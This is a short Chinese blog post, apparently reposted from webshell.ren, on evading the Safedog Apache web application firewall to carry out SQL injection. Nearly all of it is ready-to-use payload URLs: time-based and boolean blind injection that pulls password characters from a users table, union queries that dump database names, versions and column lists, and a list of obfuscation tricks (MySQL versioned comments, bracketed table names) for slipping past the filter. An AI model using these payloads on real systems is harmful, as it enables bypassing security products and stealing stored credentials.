最近出现好多服务器安全软件 帮助站长提高web服务器安全 今天来说说 过安全狗waf注入
前提web页面存在注入漏洞
测试开始本地搭建环境
环境
安全狗(APACE版)V4.0 防护规则全开
绕过
1. 延时盲注
http://192.168.6.145/test.php?id=2' and if(substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1,sleep(5 ),1)–+
2. 布尔盲注
http://192.168.6.145/test.php?id=2' and substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1–+
3. 查库名/用户名
http://192.168.6.145/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,(/*!40000database*/()),3)– -
4. 查版本
http://192.168.6.145/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,{/*!f*/version()},3)– -
5. 联合查询
http://192.168.6.145/test.php?id=-1'union /*!40000DISTINCT*/(/*!40000select*/1,(select group_concat(column_name) from (information_schema.columns) where table_name='users'),3)– -
技巧
1. union select 1,2,3 => union/*!40000DISTINCT*/(/*!40000select*/1,2,3)
2. select password from => select password*1.from user => select password from (user)
3. version() => {/*!f*/version()}
本文来源:https://www.webshell.ren/post-320.html
评论留言